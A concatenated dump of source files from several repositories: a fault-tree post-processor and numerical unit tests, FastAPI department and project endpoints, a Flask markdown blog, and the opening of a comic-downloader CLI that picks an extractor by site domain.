faultTree = xmlU.findAllRecursive(faultTree,'opsa-mef')
for gate in xmlU.findAllRecursive(faultTree[0], 'define-gate'):
ftGate = FTGate(gate)
self.gateList[gate.get('name')] = ftGate
self.gateID.append(gate.get('name'))
for basicEvent in xmlU.findAllRecursive(faultTree[0], 'basic-event'):
self.basicEvents.append(basicEvent.get('name'))
for houseEvent in xmlU.findAllRecursive(faultTree[0], 'define-house-event'):
value = houseEvent.find('constant').get('value')
if value in ['True','true']:
value = 1.
elif value in ['False','false']:
value = 0.
else:
          raise IOError('FTImporterPostProcessor Post-Processor ' + self.name + ': house event ' + str(houseEvent.get('name')) + ' has a non-boolean value (True or False)')
self.houseEvents[houseEvent.get('name')] = value
    if self.topEventID not in self.gateID:
raise IOError('FTImporterPostProcessor: specified top event ' + str(self.topEventID) + ' is not contained in the fault-tree; available gates are: ' + str(self.gateID))
def returnDict(self):
"""
This method calculates all possible input combinations and the corresponding output values
@ In, None
@ Out, outcome, dict, dictionary containing
"""
self.FTsolver()
outcome = self.constructData()
return outcome
def FTsolver(self):
"""
This method determines the ordered sequence of gates to compute in order to solve the full FT.
The determined ordered sequence is stored in self.gateSequence.
@ In, None
@ Out, None
"""
self.gateSequence = []
availBasicEvents = copy.deepcopy(self.basicEvents)
availBasicEvents = availBasicEvents + list(self.houseEvents.keys())
counter = 0
while True:
complete=False
for gate in self.gateList.keys():
if set(self.gateList[gate].returnArguments()) <= set(availBasicEvents):
self.gateSequence.append(gate)
availBasicEvents.append(gate)
if set(availBasicEvents) == set(itertools.chain(self.basicEvents,self.gateID,self.houseEvents.keys())):
complete=True
break
if counter > len(self.gateList.keys()):
raise IOError('FTImporterPostProcessor Post-Processor ' + self.name + ': the provided FT cannot be computed')
counter += 1
if complete:
break
def evaluateFT(self,combination):
"""
This method determines the outcome of the FT given a set of basic-event values
@ In, combination, dict, dictionary containing values for all basic-events
@ Out, values, dict, dictionary containing calculated values for all gates
"""
values = {}
for gate in self.gateSequence:
values[gate] = self.gateList[gate].evaluate(combination)
combination[gate] = values[gate]
return values
def constructData(self):
"""
      This method builds the full truth table of the basic events and the corresponding top-event outcomes
@ In, None
@ Out, outcome, dict, dictionary containing calculated values for all basic-events and the Top-event
"""
combinations = list(itertools.product([0,1],repeat=len(self.basicEvents)))
outcome={}
outcome={key:np.zeros(len(combinations)) for key in self.basicEvents}
outcome[self.topEventID] = np.zeros(len(combinations))
for index,combination in enumerate(combinations):
      combinationDict = {key: combination[i] for i, key in enumerate(self.basicEvents)}
for houseEvent in self.houseEvents.keys():
combinationDict[houseEvent] = self.houseEvents[houseEvent]
out = self.evaluateFT(combinationDict)
for key in self.basicEvents:
outcome[key][index]=float(combinationDict[key])
outcome[self.topEventID][index] = out[self.topEventID]
return outcome
```
#### File: unit_tests/TSA/testFourier.py
```python
import os
import sys
import copy
import numpy as np
# add RAVEN to path
frameworkDir = os.path.abspath(os.path.join(*([os.path.dirname(__file__)] + [os.pardir]*4 + ['framework'])))
if frameworkDir not in sys.path:
sys.path.append(frameworkDir)
from utils.utils import find_crow
find_crow(frameworkDir)
from utils import xmlUtils
from TSA import Fourier
plot = False
print('Module undergoing testing:')
print(Fourier)
print('')
results = {"pass":0,"fail":0}
def checkFloat(comment, value, expected, tol=1e-10, update=True):
"""
This method is aimed to compare two floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
if np.isnan(value) and np.isnan(expected):
res = True
elif np.isnan(value) or np.isnan(expected):
res = False
else:
res = abs(value - expected) <= tol
if update:
if not res:
print("checking float",comment,'|',value,"!=",expected)
results["fail"] += 1
else:
results["pass"] += 1
return res
def checkTrue(comment, res, update=True):
"""
This method is a pass-through for consistency and updating
@ In, comment, string, a comment printed out if it fails
@ In, res, bool, the tested value
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if test
"""
if update:
if res:
results["pass"] += 1
else:
print("checking bool",comment,'|',res,'is not True!')
results["fail"] += 1
return res
def checkSame(comment, value, expected, update=True):
"""
This method is aimed to compare two identical things
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
res = value == expected
if update:
if res:
results["pass"] += 1
else:
print("checking string",comment,'|',value,"!=",expected)
results["fail"] += 1
return res
def checkArray(comment, first, second, dtype, tol=1e-10, update=True):
"""
This method is aimed to compare two arrays
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
res = True
if len(first) != len(second):
res = False
print("checking answer",comment,'|','lengths do not match:',len(first),len(second))
else:
for i in range(len(first)):
if dtype == float:
pres = checkFloat('',first[i],second[i],tol,update=False)
      elif dtype == str:
pres = checkSame('',first[i],second[i],update=False)
if not pres:
print('checking array',comment,'|','entry "{}" does not match: {} != {}'.format(i,first[i],second[i]))
res = False
if update:
if res:
results["pass"] += 1
else:
results["fail"] += 1
return res
def checkNone(comment, entry, update=True):
"""
Checks if entry is None.
@ In, comment, string, a comment printed out if it fails
@ In, entry, object, to test if against None
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if None
"""
res = entry is None
if update:
if res:
results["pass"] += 1
else:
print("checking answer",comment,'|','"{}" is not None!'.format(entry))
results["fail"] += 1
def checkFails(comment, errstr, function, update=True, args=None, kwargs=None):
"""
Checks if expected error occurs
@ In, comment, string, a comment printed out if it fails
@ In, errstr, str, expected fail message
@ In, function, method, method to run to test for failure
@ In, update, bool, optional, if False then don't update results counter
@ In, args, list, arguments to pass to function
@ In, kwargs, dict, keyword arguments to pass to function
@ Out, res, bool, True if failed as expected
"""
print('Error testing ...')
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
function(*args,**kwargs)
res = False
msg = 'Function call did not error!'
except Exception as e:
res = checkSame('',e.args[0],errstr,update=False)
if not res:
msg = 'Unexpected error message. \n Received: "{}"\n Expected: "{}"'.format(e.args[0],errstr)
if update:
if res:
results["pass"] += 1
print(' ... end Error testing (PASSED)')
else:
print("checking error",comment,'|',msg)
results["fail"] += 1
print(' ... end Error testing (FAILED)')
print('')
return res
######################################
# CONSTRUCTION #
######################################
def createFourierXML(targets, periods):
xml = xmlUtils.newNode('Fourier', attrib={'target':','.join(targets)})
xml.append(xmlUtils.newNode('periods', text=','.join(str(k) for k in periods)))
return xml
def createFromXML(xml):
fourier = Fourier()
inputSpec = Fourier.getInputSpecification()()
inputSpec.parseNode(xml)
fourier.handleInput(inputSpec)
return fourier
def createFourier(targets, periods):
xml = createFourierXML(targets, periods)
fourier = createFromXML(xml)
return fourier
def createFourierSignal(amps, periods, phases, pivot, intercept=0, plot=False):
if plot:
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
signal = np.zeros(len(pivot)) + intercept
for k, period in enumerate(periods):
new = amps[k] * np.sin(2 * np.pi / period * pivot + phases[k])
if plot:
ax.plot(pivot, new, ':')
signal += new
if plot:
ax.plot(pivot, signal, 'k-')
plt.show()
return signal
###################
# Simple #
###################
# generate signal
targets = ['A', 'B', 'C']
pivot = np.arange(100) / 10.
periods = [2, 5, 10]
amps = [0.5, 1, 2]
phasesA = [0, np.pi, 0]
signalA = createFourierSignal(amps, periods, phasesA, pivot, plot=plot)
phasesB = [np.pi, 0, np.pi/4]
signalB = createFourierSignal(amps, periods, phasesB, pivot, plot=plot)
phasesC = [np.pi, np.pi/4, -np.pi/4]
interceptC = 2
signalC = createFourierSignal(amps, periods, phasesC, pivot, intercept=interceptC, plot=plot)
signals = np.zeros((len(pivot), 3))
signals[:, 0] = signalA
signals[:, 1] = signalB
signals[:, 2] = signalC
fourier = createFourier(targets, periods)
params = fourier.characterize(signals, pivot, targets)
# intercepts
checkFloat('Signal A intercept', params['A']['intercept'], 0)
checkFloat('Signal B intercept', params['B']['intercept'], 0)
checkFloat('Signal C intercept', params['C']['intercept'], interceptC)
# amplitudes
checkFloat('Signal A period 0 amplitude', params['A']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal A period 1 amplitude', params['A']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal A period 2 amplitude', params['A']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal B period 0 amplitude', params['B']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal B period 1 amplitude', params['B']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal B period 2 amplitude', params['B']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal C period 0 amplitude', params['C']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal C period 1 amplitude', params['C']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal C period 2 amplitude', params['C']['coeffs'][periods[2]]['amplitude'], amps[2])
# phases
# check absolute value of phase pi since -pi and pi are often converged on separately
checkFloat('Signal A period 0 phase', params['A']['coeffs'][periods[0]]['phase'] , phasesA[0])
checkFloat('Signal A period 1 phase', abs(params['A']['coeffs'][periods[1]]['phase']), phasesA[1])
checkFloat('Signal A period 2 phase', params['A']['coeffs'][periods[2]]['phase'] , phasesA[2])
checkFloat('Signal B period 0 phase', abs(params['B']['coeffs'][periods[0]]['phase']), phasesB[0])
checkFloat('Signal B period 1 phase', params['B']['coeffs'][periods[1]]['phase'] , phasesB[1])
checkFloat('Signal B period 2 phase', params['B']['coeffs'][periods[2]]['phase'] , phasesB[2])
checkFloat('Signal C period 0 phase', abs(params['C']['coeffs'][periods[0]]['phase']), phasesC[0])
checkFloat('Signal C period 1 phase', params['C']['coeffs'][periods[1]]['phase'] , phasesC[1])
checkFloat('Signal C period 2 phase', params['C']['coeffs'][periods[2]]['phase'] , phasesC[2])
# recreate signals
res = fourier.generate(params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} replication', res[:, tg], signals[:, tg], float)
##### now redo with non-simultaneous fitting
params = fourier.characterize(signals, pivot, targets, simultFit=False)
# intercepts
checkFloat('Signal A intercept', params['A']['intercept'], 0)
checkFloat('Signal B intercept', params['B']['intercept'], 0)
checkFloat('Signal C intercept', params['C']['intercept'], interceptC)
# amplitudes
checkFloat('Signal A period 0 amplitude', params['A']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal A period 1 amplitude', params['A']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal A period 2 amplitude', params['A']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal B period 0 amplitude', params['B']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal B period 1 amplitude', params['B']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal B period 2 amplitude', params['B']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal C period 0 amplitude', params['C']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal C period 1 amplitude', params['C']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal C period 2 amplitude', params['C']['coeffs'][periods[2]]['amplitude'], amps[2])
# phases
# check absolute value of phase pi since -pi and pi are often converged on separately
checkFloat('Signal A period 0 phase', params['A']['coeffs'][periods[0]]['phase'] , phasesA[0])
checkFloat('Signal A period 1 phase', abs(params['A']['coeffs'][periods[1]]['phase']), phasesA[1])
checkFloat('Signal A period 2 phase', params['A']['coeffs'][periods[2]]['phase'] , phasesA[2])
checkFloat('Signal B period 0 phase', abs(params['B']['coeffs'][periods[0]]['phase']), phasesB[0])
checkFloat('Signal B period 1 phase', params['B']['coeffs'][periods[1]]['phase'] , phasesB[1])
checkFloat('Signal B period 2 phase', params['B']['coeffs'][periods[2]]['phase'] , phasesB[2])
checkFloat('Signal C period 0 phase', abs(params['C']['coeffs'][periods[0]]['phase']), phasesC[0])
checkFloat('Signal C period 1 phase', params['C']['coeffs'][periods[1]]['phase'] , phasesC[1])
checkFloat('Signal C period 2 phase', params['C']['coeffs'][periods[2]]['phase'] , phasesC[2])
# recreate signals
res = fourier.generate(params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} replication', res[:, tg], signals[:, tg], float)
# check residual
# -> generate random noise to add to signal, then check it is returned in residual
r = np.random.rand(pivot.size, len(targets))
new = r + signals
res = fourier.getResidual(new, params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} residual', res[:, tg], r[:, tg], float)
print(results)
sys.exit(results["fail"])
"""
<TestInfo>
<name>framework.unit_tests.TSA.Fourier</name>
<author>talbpaul</author>
<created>2021-01-05</created>
<classesTested>TSA.Fourier</classesTested>
<description>
This test is a Unit Test for the Fourier TimeSeriesAnalyzer classes.
</description>
</TestInfo>
"""
```
#### File: unit_tests/utils/testTreeStructure.py
```python
from __future__ import division, print_function, unicode_literals, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
import os,sys
import numpy as np
frameworkDir = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,os.pardir,'framework'))
print('framework:',frameworkDir)
sys.path.append(frameworkDir)
import MessageHandler
mh = MessageHandler.MessageHandler()
mh.initialize({'verbosity':'debug'})
from utils import TreeStructure as TS
results = {"pass":0,"fail":0}
#type comparison
def checkAnswer(comment,value,expected,tol=1e-10,updateResults=True):
"""
This method is aimed to compare two floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if abs(value - expected) > tol:
print("checking answer",comment,value,"!=",expected)
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
def checkSame(comment,value,expected,updateResults=True):
"""
This method compares two values for exact equality
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if value != expected:
print("checking answer",comment,value,"!=",expected)
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
def checkArray(comment,check,expected,tol=1e-10):
"""
This method is aimed to compare two arrays of floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, check, list, the value to compare
@ In, expected, list, the expected value
@ In, tol, float, optional, the tolerance
@ Out, None
"""
same=True
if len(check) != len(expected):
same=False
else:
for i in range(len(check)):
same = same*checkAnswer(comment+'[%i]'%i,check[i],expected[i],tol,False)
if not same:
print("checking array",comment,"did not match!")
results['fail']+=1
return False
else:
results['pass']+=1
return True
def checkType(comment,value,expected,updateResults=True):
"""
This method compares the data type of two values
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if type(value) != type(expected):
print("checking type",comment,value,'|',type(value),"!=",expected,'|',type(expected))
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
##############
# Node Tests #
##############
# TODO not complete!
#test equivalency (eq, neq, hash)
## test all same are same
a = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
checkSame('Equivalency of nodes ==:',a==b,True)
checkSame('Equivalency of nodes !=:',a!=b,False)
## test different tag
b = TS.HierarchicalNode(mh,'diffTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent tag ==:',a==b,False)
checkSame('Inequivalent tag !=:',a!=b,True)
## test different attribute name
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib3':1,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test different attribute value
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':3,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test different text value
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':3,'attrib2':'2'},text='diffText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test equivalent, only tags
a = TS.HierarchicalNode(mh,'rightTag')
b = TS.HierarchicalNode(mh,'rightTag')
checkSame('Equivalency only tag ==:',a==b,True)
checkSame('Equivalency only tag !=:',a!=b,False)
## test equivalent, only values
a = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'})
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'})
checkSame('Equivalency only values ==:',a==b,True)
checkSame('Equivalency only values !=:',a!=b,False)
## test equivalent, only text
a = TS.HierarchicalNode(mh,'rightTag',text='sampleText')
b = TS.HierarchicalNode(mh,'rightTag',text='sampleText')
checkSame('Equivalency only text ==:',a==b,True)
checkSame('Equivalency only text !=:',a!=b,False)
##############
# Tree Tests #
##############
# TODO
##################
# Metadata Tests #
##################
# construction
static = TS.StaticMetadataTree(mh,'myStaticData')
dynamic = TS.DynamicMetadataTree(mh,'myDynamicData','timeParam')
# test "dynamic" attribute set correctly
checkSame('Static "dynamic" property correctly set:',static.getrootnode().get('dynamic'),'False')
checkSame('Dynamic "dynamic" property correctly set:',dynamic.getrootnode().get('dynamic'),'True')
# test message handler works (implicit test, no error means success)
static.raiseADebug('Debug message in Static successful!')
dynamic.raiseADebug('Debug message in Dynamic successful!')
results['pass']+=2
#test adding scalar entries (implicit test, no error means success)
static.addScalar('myTarget','myMetric',3.14159)
results['pass']+=1
dynamic.addScalar('myTarget','myMetric',3.14159,pivotVal=0.1) #pivot value as float
results['pass']+=1
dynamic.addScalar('myTarget','myMetric',299792358,pivotVal='0.2') #pivot value as string
results['pass']+=1
#test finding pivotNode (dynamic only)
a = TS.HierarchicalNode(mh,'timeParam',valuesIn={'value':0.2})
b = dynamic._findPivot(dynamic.getrootnode(),0.2)
checkSame('Finding pivot node:',b,a)
#test finding targetNode
## static
a = TS.HierarchicalNode(mh,'myTarget')
b = static._findTarget(static.getrootnode(),'myTarget')
checkSame('Finding target (static):',b,a)
## dynamic
a = TS.HierarchicalNode(mh,'myTarget')
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.2)
checkSame('Finding target (dynamic):',c,a)
#test values recorded
checkAnswer('Recorded data (static):',b.findBranch('myMetric').text,3.14159)
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.1)
checkAnswer('Recorded data (dynamic 1):',c.findBranch('myMetric').text,3.14159)
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.2)
checkAnswer('Recorded data (dynamic 2):',c.findBranch('myMetric').text,299792358)
print('{0}ed: {2}, {1}ed: {3}'.format(*(list(str(r) for r in results.keys())+list(results.values()))))
sys.exit(results["fail"])
"""
<TestInfo>
<name>framework.treeStructure</name>
<author>talbpaul</author>
<created>2016-11-01</created>
<classesTested>utils.TreeStructure</classesTested>
<description>
This test performs Unit Tests for the TreeStructure classes
It cannot be considered part of the active code but of the regression test system
</description>
<revisions>
<revision author="talbpaul" date="2016-11-08">Relocated utils tests</revision>
<revision author="alfoa" date="2017-01-21">Adding this test description.</revision>
</revisions>
</TestInfo>
"""
``` |
{
"source": "jiazhuangle/auth-server",
"score": 2
} |
#### File: api_v1/endpoints/departments.py
```python
from typing import Any, List
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi.encoders import jsonable_encoder
from pydantic.networks import EmailStr
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.config import settings
router = APIRouter()
@router.get("/", response_model=List[schemas.Department])
def read_departments(
db: Session = Depends(deps.get_db),
skip: int = 0,
limit: int = 100,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Retrieve DEPARTMENTS.
"""
if current_user.is_superuser:
departments = crud.department.get_multi(db, skip=skip, limit=limit)
return departments
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.post('/', response_model=schemas.Department)
def create_department(
*,
db: Session = Depends(deps.get_db),
department_in: schemas.DepartmentCreate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
'''
CREATE a department.
'''
if current_user.is_superuser:
return crud.department.create(db, obj_in=department_in)
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.get("/{department_id}", response_model=schemas.Department)
def read_department_by_id(
department_id: int,
current_user: models.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db),
) -> Any:
"""
Get a specific department by id.
"""
department = crud.department.get(db, id=department_id)
return department
@router.put("/{department_id}", response_model=schemas.Department)
def update_department(
*,
db: Session = Depends(deps.get_db),
department_id: int,
department_in: schemas.DepartmentUpdate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Update a department.
"""
department = crud.department.get(db, id=department_id)
if not department:
raise HTTPException(
status_code=404,
detail="The department does not exist in the system",
)
department = crud.department.update(db, db_obj=department, obj_in=department_in)
return department
```
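A quick way to exercise these endpoints is FastAPI's `TestClient`. The sketch below is illustrative only: the application import path, the `/departments` route prefix, the token header and the `name` field of `DepartmentCreate` are assumptions, not taken from the file above.
```python
# Hedged sketch: driving the department endpoints with FastAPI's TestClient.
# The app import path, route prefix, token and payload fields are assumptions.
from fastapi.testclient import TestClient

from app.main import app  # assumed location of the FastAPI instance

client = TestClient(app)
headers = {"Authorization": "Bearer <superuser-token>"}  # placeholder credentials

created = client.post("/departments/", json={"name": "R&D"}, headers=headers)
listed = client.get("/departments/", headers=headers)
updated = client.put(f"/departments/{created.json()['id']}",
                     json={"name": "Research"}, headers=headers)
print(listed.json(), updated.status_code)
```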
#### File: api_v1/endpoints/projects.py
```python
from typing import Any, List,Union
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi.encoders import jsonable_encoder
from pydantic.networks import EmailStr
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.config import settings
router = APIRouter()
@router.get("/", response_model= List[schemas.Project], response_model_exclude=["user_list"])
def read_projects(
db: Session = Depends(deps.get_db),
skip: int = 0,
limit: int = 100,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Retrieve projects.
"""
if current_user.is_superuser:
projects = crud.project.get_multi(db, skip=skip, limit=limit)
return projects
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.post('/', response_model=schemas.Project)
def create_project(
*,
db: Session = Depends(deps.get_db),
project_in: schemas.ProjectCreate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
'''
CREATE a project.
'''
if current_user.is_superuser:
return crud.project.create(db, obj_in=project_in)
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.put("/{project_id}", response_model=schemas.Project)
def update_project(
project_id: int,
project_in: schemas.ProjectUpdate,
current_user: models.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db),
) -> Any:
"""
Update a project.
"""
project = crud.project.get(db, id=project_id)
if not current_user.is_superuser:
raise HTTPException(
status_code=400, detail="The user doesn't have enough privileges"
)
project = crud.project.update(db,db_obj=project,obj_in=project_in)
return project
```
#### File: app/crud/crud_department.py
```python
from typing import Any, Dict, Optional, Union
from sqlalchemy.orm import Session
from app.core.security import get_password_hash, verify_password
from app.crud.base import CRUDBase
from app.models import Department
from app.schemas.department_schemas import DepartmentCreate, DepartmentUpdate
class CRUDDepartment(CRUDBase[Department,DepartmentCreate,DepartmentUpdate]):
def get_by_id(self,db:Session,*,id:int)->Optional[Department]:
return db.query(Department).filter_by(id=id).first()
def create(self, db: Session, *, obj_in: DepartmentCreate) -> Department:
return super().create(db,obj_in=obj_in)
def update(
self,
db: Session,
*,
db_obj: Department,
obj_in: Union[DepartmentUpdate, Dict[str, Any]]
) -> Department:
if isinstance(obj_in,dict):
update_data=obj_in
else:
update_data=obj_in.dict(exclude_unset=True)
return super().update(db,db_obj=db_obj,obj_in=update_data)
department=CRUDDepartment(Department)
``` |
{
"source": "jiazhuangle/goalkeeper",
"score": 2
} |
#### File: app/api/routes.py
```python
import base64
from flask import jsonify,g
from app.api import bp
from app.api.errors import bad_request
from app.api.auth import token_auth
from app.models import UserData
@bp.route('/user', methods=['GET'])
@token_auth.login_required
def get_user():
return jsonify(g.current_user.to_dict())
```
#### File: jiazhuangle/goalkeeper/goalkeeper.py
```python
from app import create_app, db
from app.models import User, UserData
app = create_app()
@app.shell_context_processor
def make_shell_context():
return {'db': db, 'User': User, 'UserData': UserData }
``` |
{
"source": "jiazifa/blog",
"score": 2
} |
#### File: blog/app/views.py
```python
from typing import Optional, Any, Dict, List, Tuple
import os
from flask import (
jsonify,
request,
Flask,
g,
current_app,
render_template,
send_from_directory,
redirect,
url_for,
flash,
)
import mistune
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
from flask.helpers import get_env
from flask.views import MethodView
from app import helpers
logger = helpers.get_logger(__name__)
def block_code(text, lang, inlinestyles=False, linenos=False):
if not lang:
text = text.strip()
return u'<pre><code>%s</code></pre>\n' % mistune.escape(text)
try:
lexer = get_lexer_by_name(lang, stripall=True)
formatter = HtmlFormatter(
noclasses=inlinestyles, linenos=linenos
)
code = highlight(text, lexer, formatter)
if linenos:
return '<div class="highlight">%s</div>\n' % code
return code
except Exception:
return '<pre class="%s"><code>%s</code></pre>\n' % (
lang, mistune.escape(text)
)
class HighlightMixin(object):
def block_code(self, text, lang):
# renderer has an options
inlinestyles = self.options.get('inlinestyles')
return block_code(text, lang, inlinestyles, False)
class TocRenderer(HighlightMixin, mistune.Renderer):
pass
def load_all_articles(dir_path: str) -> List[str]:
all_files = os.listdir(dir_path)
display_files = filter(lambda n: not n.startswith('.'), all_files)
whole_paths = list(map(lambda n: os.path.join(dir_path, n), display_files))
return whole_paths
def load_article_content(path: str) -> str:
with open(path) as f:
return f.read()
def render_content_to_markdown(content: str) -> str:
renderer = TocRenderer(linenos=True, inlinestyles=False)
markdown = mistune.Markdown(escape=True, renderer=renderer)
return markdown(content)
def article_list() -> List[Dict[str, str]]:
if "site" not in g:
return jsonify({'e': 'no site'})
dir_path = g.site['target_dir']
whole_paths = load_all_articles(dir_path)
payload: List[Dict[str, str]] = []
for path in whole_paths:
filename = path.split('/')[-1].split('.')[0]
title = filename.split('-')[-1]
publish_date = "-".join(filename.split('-')[:-1])
payload.append(
{
'path': path,
'filename': filename,
'title': title,
'description': publish_date,
'last_modified': '昨天'
}
)
return payload
def favicon_ico():
return current_app.send_static_file("images/favicon.ico")
def index():
payload = article_list()
return render_template("index.html", title='tree', payload=payload)
def article(title: str):
a_list = article_list()
ta = list(filter(lambda t: t['title'] == title, a_list))[0]
content = load_article_content(ta['path'])
payload = render_content_to_markdown(content)
return render_template('detail.html', title=title, post={'title': title, 'content': payload})
def not_found(error: Exception) -> Tuple[str, int]:
return render_template("404.html"), 404
def fetch_target_dir() -> Optional[str]:
return os.getenv("TARGET_DIR")
def load_site_config():
if "site" not in g:
target = fetch_target_dir()
if not target:
return
g.site = {
'target_dir': target,
'title': 'Tree',
}
def about_me():
return render_template("aboutme.html")
def init_app(app: Flask) -> None:
app.add_url_rule("/", view_func=index, methods=["GET"])
app.add_url_rule("/article/<string:title>", view_func=article, methods=["GET"])
app.add_url_rule("/favicon.ico", view_func=favicon_ico)
app.add_url_rule("/aboutme", view_func=about_me, methods=["GET"])
app.register_error_handler(404, not_found)
app.before_request(load_site_config)
``` |
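The rendering path above (`TocRenderer` plus `mistune.Markdown`) can be exercised on its own. A minimal sketch, assuming the mistune 1.x API that the file uses and that the module is importable as `app.views`:
```python
# Sketch of the markdown pipeline defined in views.py (assumes mistune 1.x).
import mistune

from app.views import TocRenderer  # assumed import path for the renderer above

renderer = TocRenderer(linenos=True, inlinestyles=False)
markdown = mistune.Markdown(escape=True, renderer=renderer)

sample = "# Title\n\n    print('hi')\n\nSome *emphasised* text."
html = markdown(sample)  # the indented block is routed through block_code()
print(html)
```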
{
"source": "jiazifa/CartoonExtractor",
"score": 3
} |
#### File: src/cartoon/cli.py
```python
import os
import io
import re
import sys
import time
import json
import argparse
import logging
from importlib import import_module
from argparse import ArgumentParser
from typing import Tuple, Any, Dict, List, Callable, Optional, Union
from urllib import parse, request, error
import cartoon
from cartoon.common import *
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding="utf-8")
SITES = {
"fzdm": "fzdm",
"jav468": "jav",
"kuaikanmanhua": "kkmh",
"meizi.info": "mz",
"mzitu": "mztu",
"177pic": "177pic"
}
# global var
prefer_list: bool = False
def url_to_module(url: str) -> Tuple[Any, str]:
"""
Find the extractor module for a url by matching its domain against SITES.
Return: (module, url); falls back to the universal extractor when unmatched.
"""
r = parse.urlparse(url)
domain = r.netloc
safe_starts = ["www."]
for start in safe_starts:
if domain.startswith(start): domain = domain.replace(start, "")
safe_ends: List[str] = [".com", ".cn", ".org", ".info"]
for ends in safe_ends:
if domain.endswith(ends): domain = domain.replace(ends, "")
k = domain
if k in SITES:
return (import_module(".".join(["cartoon", "extractors", SITES[k]])), url)
else:
return (import_module(".".join(["cartoon", "extractors", "universal"])), url)
def any_download(url: str, **kwargs):
"""
Download a single html url.
Use the matched extractor module if any, otherwise the universal downloader.
"""
m, url = url_to_module(url)
m.prefer_download(url)
def any_download_playlist(url: str, **kwargs):
"""
Download a playlist html url.
Use the matched extractor module if any, otherwise the universal downloader.
"""
m, url = url_to_module(url)
